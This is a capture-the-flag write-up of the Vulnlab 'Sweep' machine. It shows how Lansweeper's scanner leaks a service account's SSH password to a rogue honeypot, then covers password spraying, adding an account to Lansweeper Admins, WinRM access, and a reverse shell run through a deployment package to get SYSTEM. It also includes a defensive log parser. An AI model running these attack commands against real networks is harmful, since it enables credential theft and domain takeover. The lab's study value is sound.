
VL - Sweep

Sweep is a medium rated Windows Vulnlab machine created by Yeeb. The machine consists of getting access through weak credentials, abusing Lansweeper functionalities and abusing more Lansweeper functionalities.

Enumeration

As usual we start with a quick Nmap scan:

PORT     STATE    SERVICE       VERSION
53/tcp   open     domain        Simple DNS Plus
81/tcp   open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp   open     ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-29 20:02:00Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds?
464/tcp  open     kpasswd5?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open     ldapssl?
3259/tcp filtered epncdp2
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3389/tcp open     ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-29T20:03:05+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2024-02-07T19:09:42
|_Not valid after:  2024-08-08T19:09:42
| rdp-ntlm-info:
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   DNS_Tree_Name: sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-02-29T20:02:24+00:00
5357/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

We can now use NetExec to enumerate SMB shares and brute-force the RIDs with the Guest user:

nxc smb 10.10.109.70 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.109.70    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.109.70    445    INVENTORY        [+] sweep.vl\Guest:
SMB         10.10.109.70    445    INVENTORY        [*] Enumerated shares
SMB         10.10.109.70    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.109.70    445    INVENTORY        -----           -----------     ------
SMB         10.10.109.70    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.109.70    445    INVENTORY        C$                              Default share
SMB         10.10.109.70    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.109.70    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.109.70    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.109.70    445    INVENTORY        NETLOGON                        Logon server share
SMB         10.10.109.70    445    INVENTORY        SYSVOL                          Logon server share
SMB         10.10.109.70    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.109.70    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.109.70    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.109.70    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.109.70    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.109.70    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.109.70    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.109.70    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

With this output we can build a user list and test for weak credentials, such as the username used as the password or patterns like [company][year] and [season][year].

nxc smb 10.10.109.70 -u users.txt -p passwords.txt --shares --continue-on-success
SMB         10.10.109.70    445    INVENTORY        [+] sweep.vl\intern:[REDACTED]

With working credentials we can access Lansweeper, and we can also run BloodHound to get some more information about the environment:

bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.109.70 -u intern -p [REDACTED] --zip

One thing that stands out is the shortest path to Domain Admin, which goes through the svc_inventory_lnx user via:

  • GenericAll on Lansweeper Admins, so once we get access to this user we can add ourselves to this group.

Capturing Credentials

There are SSH credentials configured for the svc_inventory_lnx user and Windows credentials for svc_inventory_win. We can try capturing one of these with an SSH honeypot like sshesame; there are many more, but this one popped up first. The documentation is simple and straightforward; the only important change is in the sshesame.yaml file, to make it listen on 0.0.0.0:22:

./sshesame --config sshesame.yaml 
INFO 2024/03/16 21:07:45 No host keys configured, using keys at "/home/bushidosan/.local/share/sshesame"
INFO 2024/03/16 21:07:45 Listening on [::]:22
WARNING 2024/03/16 21:09:24 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/03/16 21:09:28 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/03/16 21:09:28 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" without credentials rejected
2024/03/16 21:09:29 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" with password [REDACTED] accepted
2024/03/16 21:09:29 [10.10.109.70:57075] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
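
The log above is the security-relevant evidence: the scanner offered the svc_inventory_lnx password to a host it had never verified, so any listener on the network can collect it. As an added example (not part of the original post or of sshesame), the following Python parses that log format and reports which accounts were exposed and the client banner that presented them; the log lines are constructed from the format above with a placeholder in place of the password, and the regexes are assumed to match sshesame's password-auth and client-version lines.

```python
import re

# Constructed sample, modelled on the sshesame output above.
# "[REDACTED]" stands in for the password value; no real credential is included.
SAMPLE_LOG = """\
INFO 2024/03/16 21:07:45 Listening on [::]:22
WARNING 2024/03/16 21:09:24 Failed to accept connection: Failed to establish SSH server connection: EOF
2024/03/16 21:09:28 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" without credentials rejected
2024/03/16 21:09:29 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" with password [REDACTED] accepted
2024/03/16 21:09:29 [10.10.109.70:57075] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/03/16 21:12:01 [10.10.109.70:57090] authentication for user "root" without credentials rejected
"""

# Assumed line shapes, derived from the output shown in the post.
AUTH_RE = re.compile(
    r'^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<src>[^\]]+)\] '
    r'authentication for user "(?P<user>[^"]+)" '
    r'(?:with (?P<method>password) (?P<secret>.+?)|without credentials) '
    r'(?P<result>accepted|rejected)$'
)
CLIENT_RE = re.compile(
    r'^(?P<ts>\S+ \S+) \[(?P<src>[^\]]+)\] '
    r'connection with client version "(?P<ver>[^"]+)" established$'
)


def parse_events(log_text):
    """Return (auth events, client banner per source address:port)."""
    events, clients = [], {}
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            events.append(m.groupdict())
            continue
        c = CLIENT_RE.match(line)
        if c:
            clients[c["src"]] = c["ver"]
    return events, clients


def exposed_accounts(log_text):
    """Accounts whose password was handed to the honeypot, with the source IP
    and client banner that presented it. The honeypot accepts any password, so
    'accepted' here means 'the secret was disclosed', not 'the secret was valid'."""
    events, clients = parse_events(log_text)
    exposed = {}
    for ev in events:
        if ev["result"] == "accepted" and ev["method"] == "password":
            src_ip = ev["src"].rsplit(":", 1)[0]
            banner = clients.get(ev["src"], "unknown")
            exposed.setdefault(ev["user"], set()).add((src_ip, banner))
    return {user: sorted(seen) for user, seen in exposed.items()}


if __name__ == "__main__":
    for user, seen in exposed_accounts(SAMPLE_LOG).items():
        print(f"{user}: password disclosed to honeypot by {seen}")
```

Running a canary listener like this inside the scanned range shows which scanning accounts send their password to unknown hosts; the same finding argues for key-based or host-scoped scanning credentials.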

Getting Access

With the credentials and the information gathered through BloodHound we can try adding ourselves to the Lansweeper Admins group:

net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl

This gives us both administrator rights over Lansweeper and a way to get into the server via WinRM:

evil-winrm -i <IP> -u 'svc_inventory_lnx' -p <Password>

Even more

One of the interesting features in Lansweeper is the deployment package, which allows a Lansweeper administrator to execute commands on remote systems. I added a simple PowerShell reverse shell to it from revshells.com; it doesn't really matter which one, as long as it is below 1000 characters. As stated earlier there is also a Windows service account configured with credentials; we can create a new mapping, map it to our target and run the package to obtain SYSTEM.

This post is licensed under CC BY 4.0 by the author.